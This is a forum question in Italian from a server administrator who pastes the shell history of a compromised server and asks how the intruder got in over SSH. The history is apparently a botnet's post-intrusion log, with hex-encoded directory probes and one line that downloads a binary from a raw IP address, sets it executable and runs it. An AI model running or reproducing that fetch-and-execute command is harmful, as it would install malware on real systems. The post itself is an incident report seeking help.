abbiamo una mail di abuso sul nostro server che dice "il tuo server sta tentando di hackerare ssh di un altro server, ecc ...".
Poi abbiamo controllato il nostro server e nel comando Cronologia abbiamo visto alcuni registri come mostrato di seguito:
324 /bin/busybox cp; /gweerwe323f
325 mount ;/gweerwe323f
326 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
327 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
328 echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon
329 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
330 echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon
331 echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon
332 echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon
333 echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon
334 echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon
335 echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; cat /run/.nippon; rm -f /run/.nippon
336 echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon; cat /run/lock/.nippon; rm -f /run/lock/.nippon
337 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; cat /sys/fs/cgroup/.nippon; rm -f /sys/fs/cgroup/.nippon
338 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; cat /sys/fs/cgroup/systemd/.nippon; rm -f /sys/fs/cgroup/systemd/.nippon
339 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; cat /sys/fs/cgroup/cpuset/.nippon; rm -f /sys/fs/cgroup/cpuset/.nippon
340 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon; cat /sys/fs/cgroup/cpu,cpuacct/.nippon; rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
341 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; cat /sys/fs/cgroup/blkio/.nippon; rm -f /sys/fs/cgroup/blkio/.nippon
342 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; cat /sys/fs/cgroup/devices/.nippon; rm -f /sys/fs/cgroup/devices/.nippon
343 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; cat /sys/fs/cgroup/freezer/.nippon; rm -f /sys/fs/cgroup/freezer/.nippon
344 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; cat /sys/fs/cgroup/net_cls/.nippon; rm -f /sys/fs/cgroup/net_cls/.nippon
345 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
346 echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; cat /dev/mqueue/.nippon; rm -f /dev/mqueue/.nippon
347 echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon; cat /sys/kernel/debug/.nippon; rm -f /sys/kernel/debug/.nippon
348 echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon; cat /sys/kernel/config/.nippon; rm -f /sys/kernel/config/.nippon
349 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
350 echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon; cat /boot/.nippon; rm -f /boot/.nippon
351 echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon; cat /run/user/0/.nippon; rm -f /run/user/0/.nippon
352 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
353 /gweerwe323f
354 cat /bin/echo ;/gweerwe323f
355 cat /proc/cpuinfo;/gweerwe323f
356 cd /; wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
357 ps aux
358 dmesg
Con un po 'di google abbiamo capito che è un bot che tenta di hackerare ssh.
Ma ciò che non siamo in grado di capire è come è stato in grado di entrare in ssh del server?
- Utilizziamo l'autenticazione basata su password
- Anche la password è strong con 16 caratteri (combinazione di lettere, simboli e numeri)
- La porta ssh del nostro server ha anche il numero più alto, 31000
- Non ci sono tentativi falliti nei log di autenticazione !! : (
Aiutaci a capire la situazione, come può essere in grado di entrare in ssh? Non ci sono anche registri nei server /var/log/secure
.